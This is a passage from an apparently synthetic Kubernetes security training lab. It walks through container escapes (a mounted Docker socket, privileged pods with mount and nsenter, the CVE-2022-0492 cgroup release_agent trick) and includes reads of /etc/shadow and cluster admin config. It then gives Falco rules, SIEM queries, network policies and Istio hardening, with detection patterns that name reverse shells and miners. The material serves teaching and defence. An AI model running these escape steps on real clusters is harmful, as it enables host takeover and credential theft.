
# Create a deliberately vulnerable pod in attack-lab namespace (SYNTHETIC)
$ kubectl create namespace attack-lab
$ kubectl label namespace attack-lab pod-security.kubernetes.io/enforce=privileged

# Deploy vulnerable pod with Docker socket mounted
$ cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: vulnerable-socket-pod
  namespace: attack-lab
spec:
  containers:
  - name: attacker
    image: registry.novstar.example.com/ubuntu-tools:latest
    command: ["/bin/bash", "-c", "sleep infinity"]
    volumeMounts:
    - name: docker-sock
      mountPath: /var/run/docker.sock
  volumes:
  - name: docker-sock
    hostPath:
      path: /var/run/docker.sock
      type: Socket
EOF

# Exec into the pod (SYNTHETIC — educational simulation)
$ kubectl exec -it vulnerable-socket-pod -n attack-lab -- /bin/bash

# Inside the pod: discover Docker socket is available
root@vulnerable-socket-pod:/# ls -la /var/run/docker.sock
srw-rw---- 1 root docker 0 Mar 24 10:00 /var/run/docker.sock

# Install Docker CLI inside the container
root@vulnerable-socket-pod:/# curl -fsSL https://get.docker.com -o get-docker.sh
root@vulnerable-socket-pod:/# sh get-docker.sh

# List containers on the HOST (proof of escape)
root@vulnerable-socket-pod:/# docker ps
CONTAINER ID   IMAGE                    COMMAND            STATUS        NAMES
a1b2c3d4e5f6   payment-gateway:v2.2.0   "python3 app.py"   Up 3 hours   k8s_payment...
f6e5d4c3b2a1   auth-service:v1.5.0      "node server.js"   Up 3 hours   k8s_auth...
...

# Create a privileged container that mounts the host root filesystem
root@vulnerable-socket-pod:/# docker run -it --privileged --pid=host \
    -v /:/hostfs registry.novstar.example.com/ubuntu-tools:latest \
    chroot /hostfs /bin/bash

# Now running as root on the HOST (SYNTHETIC — escape achieved)
root@host:/# whoami
root
root@host:/# cat /etc/hostname
ip-10-50-1-10.ec2.internal
root@host:/# cat /etc/shadow | head -3
root:REDACTED:19400:0:99999:7:::

Attack chain summary:

Container with Docker socket mounted
    → Docker CLI installed in container
    → List host containers via socket
    → Create new privileged container mounting host /
    → chroot into host filesystem
    → Full host root access achieved

Step 3.2: Escape via Privileged Container

A container running with --privileged has access to all host devices, can load kernel modules, and can mount the host filesystem.

# Deploy a privileged container (SYNTHETIC — attack-lab namespace only)
$ cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: vulnerable-privileged-pod
  namespace: attack-lab
spec:
  containers:
  - name: attacker
    image: registry.novstar.example.com/ubuntu-tools:latest
    command: ["/bin/bash", "-c", "sleep infinity"]
    securityContext:
      privileged: true
EOF

# Exec into the privileged pod (SYNTHETIC)
$ kubectl exec -it vulnerable-privileged-pod -n attack-lab -- /bin/bash

# Check available devices — privileged containers see host devices
root@vulnerable-privileged-pod:/# fdisk -l
Disk /dev/nvme0n1: 100 GiB, 107374182400 bytes, 209715200 sectors
...

# Mount the host root filesystem
root@vulnerable-privileged-pod:/# mkdir -p /mnt/hostfs
root@vulnerable-privileged-pod:/# mount /dev/nvme0n1p1 /mnt/hostfs

# Access host files (SYNTHETIC)
root@vulnerable-privileged-pod:/# cat /mnt/hostfs/etc/hostname
ip-10-50-1-10.ec2.internal

root@vulnerable-privileged-pod:/# cat /mnt/hostfs/etc/kubernetes/admin.conf
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: REDACTED
    server: https://203.0.113.10:6443
  name: cloudpay-prod
...

# Escape via nsenter — enter all host namespaces
root@vulnerable-privileged-pod:/# nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# Now in the host namespace as root
root@ip-10-50-1-10:/# ps aux | head -5
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  169556  9352 ?        Ss   08:00   0:03 /sbin/init
root         2  0.0  0.0       0     0 ?        S    08:00   0:00 [kthreadd]
...

Attack chain summary:

Privileged container
    → Access host /dev devices
    → Mount host root partition
    → Read sensitive files (kubelet config, SSH keys, etc.)
    → OR: nsenter --target 1 (PID 1 = host init)
    → Full host namespace access

Step 3.3: Escape via cgroup Release Agent (CVE-2022-0492)

# Inside a container with SYS_ADMIN capability (SYNTHETIC)
# This technique exploits cgroup v1 release_agent to execute
# commands on the host when a cgroup is emptied

root@vulnerable-pod:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp

# Set up the release agent to execute a payload on the host
root@vulnerable-pod:/# mkdir /tmp/cgrp/escape
root@vulnerable-pod:/# echo 1 > /tmp/cgrp/escape/notify_on_release

# Find the container's path on the host
root@vulnerable-pod:/# host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
root@vulnerable-pod:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent

# Create the escape payload (writes proof file on host) — SYNTHETIC
root@vulnerable-pod:/# cat > /cmd <<EOF
#!/bin/bash
hostname > /tmp/escape-proof.txt
id >> /tmp/escape-proof.txt
EOF
root@vulnerable-pod:/# chmod +x /cmd

# Trigger the release agent by emptying the cgroup
root@vulnerable-pod:/# sh -c "echo \$\$ > /tmp/cgrp/escape/cgroup.procs"

# The command was executed on the host (SYNTHETIC)
# Host now has /tmp/escape-proof.txt with:
#   ip-10-50-1-10.ec2.internal
#   uid=0(root) gid=0(root) groups=0(root)

Step 3.4: Detect Container Escapes with Falco

Install Falco and deploy detection rules:

# Install Falco via Helm (SYNTHETIC)
$ helm repo add falcosecurity https://falcosecurity.github.io/charts
$ helm install falco falcosecurity/falco \
    --namespace monitoring \
    --set driver.kind=ebpf \
    --set falcosidekick.enabled=true \
    --set falcosidekick.webui.enabled=true

NAME: falco
STATUS: deployed

Custom Falco Rules for Container Escape Detection:

# falco-container-escape-rules.yaml (SYNTHETIC)
# Detection rules for container escape techniques

# Rule 1: Docker socket access from container
- rule: Container Accessing Docker Socket
  desc: Detect a container process reading or writing to the Docker socket
  condition: >
    evt.type in (open, openat, connect) and
    container and
    fd.name = "/var/run/docker.sock"
  output: >
    Docker socket accessed from container
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name image=%container.image.repository
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, escape, docker_socket, T1611]

# Rule 2: Privileged container started
- rule: Privileged Container Started
  desc: Detect a privileged container being started
  condition: >
    evt.type = container and
    container.privileged = true
  output: >
    Privileged container started
    (container_id=%container.id container_name=%container.name
     image=%container.image.repository namespace=%k8s.ns.name
     pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, escape, privileged, T1611]

# Rule 3: nsenter detected in container
- rule: NSEnter Used in Container
  desc: Detect nsenter being used inside a container (namespace escape)
  condition: >
    spawned_process and
    container and
    proc.name = "nsenter"
  output: >
    nsenter executed in container — potential namespace escape
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name image=%container.image.repository
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, escape, nsenter, T1611]

# Rule 4: Mount command in container
- rule: Mount Command in Container
  desc: Detect mount being used inside a container (filesystem escape)
  condition: >
    spawned_process and
    container and
    proc.name = "mount" and
    not proc.cmdline contains "tmpfs"
  output: >
    mount executed in container — potential filesystem escape
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name namespace=%k8s.ns.name
     pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, escape, mount, T1611]

# Rule 5: cgroup release agent modification
- rule: Cgroup Release Agent Modified
  desc: Detect modification of cgroup release_agent — potential container escape
  condition: >
    open_write and
    container and
    fd.name endswith "release_agent"
  output: >
    cgroup release_agent modified in container — likely escape attempt
    (user=%user.name command=%proc.cmdline file=%fd.name
     container_id=%container.id container_name=%container.name
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, escape, cgroup, CVE-2022-0492, T1611]

# Rule 6: Host device access from container
- rule: Container Accessing Host Device
  desc: Detect container accessing host block devices
  condition: >
    (evt.type in (open, openat)) and
    container and
    fd.name startswith "/dev/" and
    not fd.name in ("/dev/null", "/dev/zero", "/dev/urandom", "/dev/random",
                     "/dev/stdin", "/dev/stdout", "/dev/stderr",
                     "/dev/pts/", "/dev/shm/")
  output: >
    Container accessing host device — potential escape via device mount
    (user=%user.name command=%proc.cmdline device=%fd.name
     container_id=%container.id container_name=%container.name
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, escape, device, T1611]

# Rule 7: Kubernetes service account token access
- rule: Service Account Token Read
  desc: Detect process reading Kubernetes service account token
  condition: >
    open_read and
    container and
    fd.name startswith "/var/run/secrets/kubernetes.io/serviceaccount"
  output: >
    Service account token read in container
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name namespace=%k8s.ns.name
     pod=%k8s.pod.name file=%fd.name)
  priority: WARNING
  tags: [container, credential_access, kubernetes, T1528]

# Rule 8: Reverse shell detection in container
- rule: Reverse Shell in Container
  desc: Detect reverse shell being spawned inside a container
  condition: >
    spawned_process and
    container and
    ((proc.name in ("bash", "sh", "dash") and proc.cmdline contains "/dev/tcp") or
     (proc.name = "python" and proc.cmdline contains "socket") or
     (proc.name = "nc" and proc.cmdline contains "-e") or
     (proc.name = "ncat" and proc.cmdline contains "--exec"))
  output: >
    Reverse shell spawned in container
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name namespace=%k8s.ns.name
     pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, execution, reverse_shell, T1059]
# Deploy the custom rules (SYNTHETIC)
$ kubectl create configmap falco-custom-rules \
    --from-file=falco-container-escape-rules.yaml \
    --namespace monitoring

# Verify Falco is detecting events
$ kubectl logs -l app.kubernetes.io/name=falco -n monitoring --tail=20

10:45:32.123456789: Critical Docker socket accessed from container
  (user=root command=docker ps container_id=a1b2c3d4
   container_name=attacker image=registry.novstar.example.com/ubuntu-tools
   namespace=attack-lab pod=vulnerable-socket-pod)

10:46:15.987654321: Critical nsenter executed in container  potential namespace escape
  (user=root command=nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
   container_id=b2c3d4e5
   container_name=attacker image=registry.novstar.example.com/ubuntu-tools
   namespace=attack-lab pod=vulnerable-privileged-pod)

Detection Queries — Container Escape

KQL — Detect container escape indicators:

// KQL: Detect Docker socket access from within containers
ContainerLog
| where TimeGenerated > ago(1h)
| where LogEntry has_any ("docker.sock", "/var/run/docker.sock")
| project TimeGenerated, ContainerID, LogEntry, Image, Name
| sort by TimeGenerated desc

// KQL: Detect nsenter or chroot execution in containers
SecurityEvent
| where TimeGenerated > ago(1h)
| where ProcessName in ("nsenter", "chroot", "unshare")
| where ContainerID != ""
| project TimeGenerated, Computer, ProcessName, CommandLine,
          ContainerID, Account
| sort by TimeGenerated desc

// KQL: Detect privileged pod creation via Kubernetes audit logs
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "privileged" and log_s has "true"
| extend AuditLog = parse_json(log_s)
| extend User = tostring(AuditLog.user.username)
| extend Verb = tostring(AuditLog.verb)
| extend Resource = tostring(AuditLog.objectRef.resource)
| extend Namespace = tostring(AuditLog.objectRef.namespace)
| where Verb in ("create", "update", "patch")
| project TimeGenerated, User, Verb, Resource, Namespace,
          SourceIP = tostring(AuditLog.sourceIPs[0])
| sort by TimeGenerated desc

// KQL: Detect mount operations inside containers
let escape_indicators = dynamic(["nsenter", "mount /dev/", "chroot",
    "release_agent", "docker.sock", "cgroup"]);
ContainerLog
| where TimeGenerated > ago(4h)
| where LogEntry has_any (escape_indicators)
| extend Indicator = extract(@"(nsenter|mount /dev/|chroot|release_agent|docker\.sock|cgroup)", 1, LogEntry)
| project TimeGenerated, ContainerID, Image, Name, Indicator, LogEntry
| summarize Count=count(), Indicators=make_set(Indicator) by ContainerID, Image
| where Count > 0
| sort by Count desc

SPL — Detect container escape patterns:

// SPL: Detect Docker socket access inside containers
index=kubernetes sourcetype="falco"
| where rule="Container Accessing Docker Socket"
| stats count by container_name, container_id, k8s_ns_name, k8s_pod_name, image
| sort -count
| rename k8s_ns_name as "Namespace", k8s_pod_name as "Pod",
         container_name as "Container", image as "Image"

// SPL: Detect privilege escalation attempts in containers
index=kubernetes sourcetype="falco"
| where priority IN ("Critical", "Error")
| where rule IN ("NSEnter Used in Container", "Privileged Container Started",
                  "Cgroup Release Agent Modified", "Container Accessing Host Device")
| stats count by rule, container_name, k8s_ns_name, k8s_pod_name, user_name
| sort -count

// SPL: Detect anomalous process execution in containers
index=kubernetes sourcetype="kube:container:exec"
| eval suspicious=if(match(command, "(nsenter|chroot|mount|fdisk|docker|kubectl)"), "yes", "no")
| where suspicious="yes"
| stats count values(command) as commands by namespace, pod_name, container_name, user
| sort -count
| rename namespace as "Namespace", pod_name as "Pod", commands as "Suspicious Commands"

Step 3.5: Prevention Checklist

Control Implementation Prevents
Pod Security Standards: Restricted Namespace label enforcement Privileged containers, hostPath, root
Drop all capabilities securityContext.capabilities.drop: ["ALL"] Capability-based escapes
Read-only root filesystem readOnlyRootFilesystem: true Writing escape payloads
Disable service account auto-mount automountServiceAccountToken: false Kubernetes API abuse from pod
Seccomp profile seccompProfile.type: RuntimeDefault Blocks dangerous syscalls
AppArmor profile Pod annotation with custom profile Restricts file/network access
No hostPID / hostNetwork Pod Security Standard enforcement Namespace escapes
Admission controller OPA Gatekeeper / Kyverno Policy violation prevention
Runtime detection Falco with custom rules Real-time alerting on escape attempts

Key Takeaways — Exercise 3

Container Escape Defense

  1. Mounted Docker sockets are critical vulnerabilities — Never mount /var/run/docker.sock in production containers; use the Kubernetes API instead
  2. Privileged containers = host access — A privileged container has effectively no isolation; treat it as running directly on the host
  3. Defense in depth matters — Prevention (admission controllers) + detection (Falco) + response (automated remediation) all work together
  4. cgroup and namespace escapes are real threats — Keep kernels patched, enforce seccomp profiles, and monitor for syscall anomalies
  5. ATT&CK mapping — Container escapes map to T1611 (Escape to Host); credential access to T1528 (Steal Application Access Token)
  6. Red team informs blue team — Understanding attack techniques is essential for building effective detection rules

Exercise 4: Network Policies & Service Mesh

Objective

Implement network segmentation for the CloudPay Kubernetes cluster using NetworkPolicy, Calico/Cilium extended policies, and Istio service mesh with mTLS. Prevent lateral movement between microservices.

Prerequisites

  • Kubernetes cluster with a CNI that supports NetworkPolicy (Calico or Cilium)
  • Istio installed in the cluster
  • Understanding of Kubernetes networking model

Step 4.1: Audit Default Network Posture

By default, Kubernetes allows all pod-to-pod communication. This means any compromised pod can communicate with any other pod in the cluster.

# Verify default network behavior — all pods can communicate (SYNTHETIC)
$ kubectl run test-client --image=busybox --namespace=cloudpay-prod \
    --command -- sleep 3600

# From test-client, reach the payment gateway (should work without NetworkPolicy)
$ kubectl exec test-client -n cloudpay-prod -- wget -qO- http://payment-gateway:8080/healthz
{"status": "healthy", "version": "2.2.0"}

# From test-client, reach the auth service (should also work — no segmentation)
$ kubectl exec test-client -n cloudpay-prod -- wget -qO- http://auth-service:8080/healthz
{"status": "healthy", "version": "1.5.0"}

# From test-client, reach services in OTHER namespaces (cross-namespace)
$ kubectl exec test-client -n cloudpay-prod -- wget -qO- \
    http://prometheus-server.monitoring.svc.cluster.local:9090/api/v1/targets
{"status":"success","data":{"activeTargets":[...]}}

Risk: A compromised pod in cloudpay-prod can reach the monitoring stack, databases, and any other service cluster-wide.

Step 4.2: Implement Default-Deny NetworkPolicy

# Default-deny all ingress and egress in production namespace (SYNTHETIC)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: cloudpay-prod
spec:
  podSelector: {}   # Applies to ALL pods in namespace
  policyTypes:
  - Ingress
  - Egress
  # No ingress or egress rules = deny all
# Apply default-deny (SYNTHETIC)
$ kubectl apply -f default-deny-all.yaml
networkpolicy.networking.k8s.io/default-deny-all created

# Verify — test-client can no longer reach any service
$ kubectl exec test-client -n cloudpay-prod -- wget -qO- --timeout=3 \
    http://payment-gateway:8080/healthz
wget: download timed out

# Even DNS is blocked
$ kubectl exec test-client -n cloudpay-prod -- nslookup payment-gateway
;; connection timed out; no servers could be reached

Step 4.3: Allow Required Traffic with Fine-Grained Policies

# Allow DNS resolution for all pods (required for service discovery)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns
  namespace: cloudpay-prod
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
    ports:
    - protocol: UDP
      port: 53
    - protocol: TCP
      port: 53

---
# Payment gateway: allow ingress from ingress controller only
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: payment-gateway-ingress
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      app: payment-gateway
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: ingress-nginx
      podSelector:
        matchLabels:
          app.kubernetes.io/name: ingress-nginx
    ports:
    - protocol: TCP
      port: 8080

---
# Payment gateway: allow egress to auth-service and database only
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: payment-gateway-egress
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      app: payment-gateway
  policyTypes:
  - Egress
  egress:
  # To auth-service
  - to:
    - podSelector:
        matchLabels:
          app: auth-service
    ports:
    - protocol: TCP
      port: 8080
  # To PostgreSQL database
  - to:
    - ipBlock:
        cidr: 10.50.2.10/32
    ports:
    - protocol: TCP
      port: 5432
  # To Redis cache
  - to:
    - ipBlock:
        cidr: 10.50.2.20/32
    ports:
    - protocol: TCP
      port: 6379

---
# Auth service: allow ingress from payment-gateway and user-service only
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: auth-service-ingress
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      app: auth-service
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: payment-gateway
    - podSelector:
        matchLabels:
          app: user-service
    ports:
    - protocol: TCP
      port: 8080

---
# Monitoring: allow Prometheus scraping from monitoring namespace
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-prometheus-scrape
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      monitoring: enabled
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: monitoring
      podSelector:
        matchLabels:
          app: prometheus
    ports:
    - protocol: TCP
      port: 9090
# Apply all network policies (SYNTHETIC)
$ kubectl apply -f network-policies/
networkpolicy.networking.k8s.io/allow-dns created
networkpolicy.networking.k8s.io/payment-gateway-ingress created
networkpolicy.networking.k8s.io/payment-gateway-egress created
networkpolicy.networking.k8s.io/auth-service-ingress created
networkpolicy.networking.k8s.io/allow-prometheus-scrape created

# Verify — payment gateway can reach auth-service
$ kubectl exec deployment/payment-gateway -n cloudpay-prod -- \
    wget -qO- --timeout=3 http://auth-service:8080/healthz
{"status": "healthy", "version": "1.5.0"}

# Verify — payment gateway CANNOT reach reporting-service (not in policy)
$ kubectl exec deployment/payment-gateway -n cloudpay-prod -- \
    wget -qO- --timeout=3 http://reporting-service:8080/healthz
wget: download timed out

# Verify — payment gateway CANNOT reach monitoring namespace
$ kubectl exec deployment/payment-gateway -n cloudpay-prod -- \
    wget -qO- --timeout=3 http://prometheus-server.monitoring:9090/api/v1/targets
wget: download timed out

Step 4.4: Calico Extended Network Policies

Calico provides extended policy features beyond standard Kubernetes NetworkPolicy, including DNS-based policies, application layer rules, and global policies.

# Calico GlobalNetworkPolicy — block egress to metadata service (SYNTHETIC)
# Prevents SSRF attacks targeting cloud metadata (169.254.169.254)
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: deny-cloud-metadata
spec:
  selector: all()
  types:
  - Egress
  egress:
  - action: Deny
    destination:
      nets:
      - 169.254.169.254/32
    protocol: TCP

---
# Calico NetworkPolicy — DNS-based egress control (SYNTHETIC)
apiVersion: projectcalico.org/v3
kind: NetworkPolicy
metadata:
  name: payment-gateway-dns-egress
  namespace: cloudpay-prod
spec:
  selector: app == "payment-gateway"
  types:
  - Egress
  egress:
  # Allow egress only to specific external domains
  - action: Allow
    destination:
      domains:
      - "api.stripe.example.com"
      - "vault.novstar.example.com"
    protocol: TCP
    destination:
      ports: [443]
  # Deny all other external egress
  - action: Deny
    destination:
      notNets:
      - 10.0.0.0/8
      - 172.16.0.0/12
      - 192.168.0.0/16

Step 4.5: Istio Service Mesh Security — mTLS

# Install Istio (SYNTHETIC)
$ istioctl install --set profile=default -y

 Istio core installed
 Istiod installed
 Ingress gateways installed
 Installation complete

# Enable sidecar injection for the production namespace
$ kubectl label namespace cloudpay-prod istio-injection=enabled
namespace/cloudpay-prod labeled

# Restart deployments to inject sidecars
$ kubectl rollout restart deployment -n cloudpay-prod
deployment.apps/payment-gateway restarted
deployment.apps/auth-service restarted
deployment.apps/order-service restarted
deployment.apps/user-service restarted
deployment.apps/reporting-service restarted
deployment.apps/notification-service restarted

# Verify sidecar injection
$ kubectl get pods -n cloudpay-prod
NAME                                  READY   STATUS    RESTARTS   AGE
payment-gateway-7d8f9b6c4-abc12      2/2     Running   0          45s
auth-service-5f6d7e8c9-def34         2/2     Running   0          43s
order-service-3b4c5d6e7-ghi56        2/2     Running   0          41s

Enforce Strict mTLS:

# PeerAuthentication — enforce strict mTLS cluster-wide (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: default
  namespace: istio-system
spec:
  mtls:
    mode: STRICT

---
# PeerAuthentication — namespace-level enforcement (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: cloudpay-strict-mtls
  namespace: cloudpay-prod
spec:
  mtls:
    mode: STRICT

Istio Authorization Policies — Microsegmentation:

# AuthorizationPolicy — payment-gateway (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: payment-gateway-authz
  namespace: cloudpay-prod
spec:
  selector:
    matchLabels:
      app: payment-gateway
  action: ALLOW
  rules:
  # Allow ingress controller
  - from:
    - source:
        namespaces: ["ingress-nginx"]
    to:
    - operation:
        methods: ["GET", "POST"]
        paths: ["/api/v1/payments/*", "/healthz"]
  # Allow auth-service callbacks
  - from:
    - source:
        principals: ["cluster.local/ns/cloudpay-prod/sa/auth-service-sa"]
    to:
    - operation:
        methods: ["POST"]
        paths: ["/api/v1/payments/verify"]

---
# AuthorizationPolicy — deny all by default in namespace (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: deny-all
  namespace: cloudpay-prod
spec:
  {}  # Empty spec = deny all

---
# AuthorizationPolicy — auth-service (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: auth-service-authz
  namespace: cloudpay-prod
spec:
  selector:
    matchLabels:
      app: auth-service
  action: ALLOW
  rules:
  - from:
    - source:
        principals:
        - "cluster.local/ns/cloudpay-prod/sa/payment-gateway-sa"
        - "cluster.local/ns/cloudpay-prod/sa/user-service-sa"
        - "cluster.local/ns/cloudpay-prod/sa/order-service-sa"
    to:
    - operation:
        methods: ["POST"]
        paths: ["/api/v1/auth/validate", "/api/v1/auth/token"]
# Verify mTLS enforcement (SYNTHETIC)
$ istioctl x describe pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod

Pod: payment-gateway-7d8f9b6c4-abc12
   Pod Revision: default
   Pod Ports: 8080 (payment-gateway), 15090 (istio-proxy)
Suggestion: add 'version' label to pod for Istio telemetry.
--------------------
Service: payment-gateway
   Port: http 8080/HTTP targets pod port 8080
--------------------
Effective PeerAuthentication:
   Workload mTLS mode: STRICT

# Check if plaintext traffic is rejected
$ kubectl exec test-client -n cloudpay-prod -- \
    wget -qO- --timeout=3 http://payment-gateway:8080/healthz
wget: server returned error: HTTP/1.1 503 Service Unavailable
# 503 because plaintext is rejected when STRICT mTLS is enforced

Step 4.6: Egress Control — Prevent Data Exfiltration

# Istio ServiceEntry — allow only approved external services (SYNTHETIC)
apiVersion: networking.istio.io/v1beta1
kind: ServiceEntry
metadata:
  name: allowed-external-apis
  namespace: cloudpay-prod
spec:
  hosts:
  - api.stripe.example.com
  - vault.novstar.example.com
  ports:
  - number: 443
    name: https
    protocol: TLS
  resolution: DNS
  location: MESH_EXTERNAL

---
# Sidecar — restrict egress for payment-gateway (SYNTHETIC)
apiVersion: networking.istio.io/v1beta1
kind: Sidecar
metadata:
  name: payment-gateway-sidecar
  namespace: cloudpay-prod
spec:
  workloadSelector:
    labels:
      app: payment-gateway
  egress:
  - hosts:
    - "cloudpay-prod/*"            # Same namespace services
    - "istio-system/*"             # Istio control plane
    - "~/*.stripe.example.com"     # External payment API
    - "~/*.novstar.example.com"    # Internal vault

Detection Queries — Network Policies

KQL — Detect unauthorized network connections:

// KQL: Detect pods communicating with cloud metadata service
// (Potential SSRF / credential theft via IMDS)
AzureNetworkAnalytics_CL
| where TimeGenerated > ago(1h)
| where DestIP_s == "169.254.169.254"
| extend SourcePod = SrcK8S_Name_s
| extend Namespace = SrcK8S_Namespace_s
| project TimeGenerated, SourcePod, Namespace, DestIP_s, DestPort_d,
          BytesSent = SentBytes_d, BytesReceived = ReceivedBytes_d
| sort by TimeGenerated desc

// KQL: Detect cross-namespace traffic (potential lateral movement)
AzureNetworkAnalytics_CL
| where TimeGenerated > ago(1h)
| where SrcK8S_Namespace_s != DestK8S_Namespace_s
| where SrcK8S_Namespace_s == "cloudpay-prod"
| project TimeGenerated, SrcPod = SrcK8S_Name_s,
          SrcNamespace = SrcK8S_Namespace_s,
          DestPod = DestK8S_Name_s,
          DestNamespace = DestK8S_Namespace_s,
          DestPort = DestPort_d, Protocol = L7Protocol_s
| summarize Count=count() by SrcPod, DestNamespace, DestPod, DestPort
| sort by Count desc

SPL — Detect network policy violations:

// SPL: Detect traffic to cloud metadata endpoint
index=kubernetes sourcetype="calico:flowlogs"
| where dest_ip="169.254.169.254"
| stats count by src_namespace, src_pod, dest_ip, dest_port, action
| sort -count
| rename src_namespace as "Source Namespace", src_pod as "Source Pod",
         dest_ip as "Destination IP", action as "Action"

// SPL: Detect denied network connections (NetworkPolicy enforcement)
index=kubernetes sourcetype="calico:flowlogs" action="deny"
| stats count by src_namespace, src_pod, dest_namespace, dest_pod,
                 dest_port, protocol
| where count > 10
| sort -count
| rename src_namespace as "Source NS", dest_namespace as "Dest NS",
         src_pod as "Source Pod", dest_pod as "Dest Pod"

Network Segmentation Architecture

┌─────────────────────────────────────────────────────────────────────┐
│                   CloudPay Network Segmentation                     │
│                                                                     │
│  ┌───────────────────────────────────────────────────────┐         │
│  │  ingress-nginx namespace                               │         │
│  │  ┌─────────────────┐                                   │         │
│  │  │ Ingress Controller├──────────┐                       │         │
│  │  └─────────────────┘          │                       │         │
│  └───────────────────────────────┼───────────────────────┘         │
│                                  │ Port 8080 only                   │
│  ┌───────────────────────────────┼───────────────────────┐         │
│  │  cloudpay-prod namespace      │ (mTLS enforced)        │         │
│  │                               ▼                        │         │
│  │  ┌─────────────┐    ┌─────────────┐    ┌────────────┐ │         │
│  │  │  payment-   │───▶│  auth-      │◀───│  user-     │ │         │
│  │  │  gateway    │    │  service    │    │  service   │ │         │
│  │  └──────┬──────┘    └─────────────┘    └────────────┘ │         │
│  │         │                                              │         │
│  │         │ Port 5432                                    │         │
│  │  ┌──────▼──────┐    ┌─────────────┐                   │         │
│  │  │ PostgreSQL  │    │  Redis      │                   │         │
│  │  │ 10.50.2.10  │    │  10.50.2.20 │                   │         │
│  │  └─────────────┘    └─────────────┘                   │         │
│  │                                                        │         │
│  │  ╳ No cross-namespace egress                          │         │
│  │  ╳ No metadata endpoint (169.254.169.254)             │         │
│  │  ╳ No arbitrary external egress                       │         │
│  └────────────────────────────────────────────────────────┘         │
│                                                                     │
│  ┌────────────────────────────────────────────────────────┐         │
│  │  monitoring namespace (isolated)                       │         │
│  │  Prometheus ←── scrape allowed from prod pods          │         │
│  │  Grafana / Falco / Fluentd                             │         │
│  └────────────────────────────────────────────────────────┘         │
└─────────────────────────────────────────────────────────────────────┘

Key Takeaways — Exercise 4

Network Security Principles

  1. Default-deny is essential — Kubernetes allows all traffic by default; always apply a default-deny NetworkPolicy first, then explicitly allow required flows
  2. Microsegmentation limits blast radius — If a pod is compromised, network policies restrict what the attacker can reach
  3. Block cloud metadata — Always deny egress to 169.254.169.254 to prevent SSRF-based credential theft from cloud instance metadata
  4. mTLS with Istio — Service mesh provides transport encryption, identity-based access control, and observability without application changes
  5. Egress control prevents exfiltration — Restrict outbound traffic to only approved external services
  6. Layer defenses — Kubernetes NetworkPolicy + Calico/Cilium extended policies + Istio AuthorizationPolicy provide complementary controls at different layers

Exercise 5: Runtime Security & Monitoring

Objective

Deploy comprehensive runtime security monitoring for the CloudPay cluster using Falco, eBPF-based detection, container forensics techniques, and log aggregation. Build an incident response workflow for containerized environments.

Prerequisites

  • Falco installed (from Exercise 3)
  • Fluentd or Fluent Bit for log aggregation
  • Understanding of Linux system calls and eBPF

Step 5.1: Advanced Falco Rule Writing

Extend the Falco rules from Exercise 3 with application-specific and behavioral detection rules:

# falco-cloudpay-application-rules.yaml (SYNTHETIC)
# Application-specific runtime security rules for CloudPay

# Rule: Detect cryptocurrency mining processes
- rule: Cryptominer Detected in Container
  desc: Detect known cryptocurrency mining processes or connections to mining pools
  condition: >
    spawned_process and
    container and
    (proc.name in ("xmrig", "ccminer", "cgminer", "bfgminer", "minerd",
                    "cpuminer", "ethminer", "nbminer") or
     (proc.name in ("python", "python3", "node", "java") and
      proc.cmdline contains "stratum+tcp"))
  output: >
    Cryptocurrency miner detected in container
    (process=%proc.name command=%proc.cmdline container=%container.name
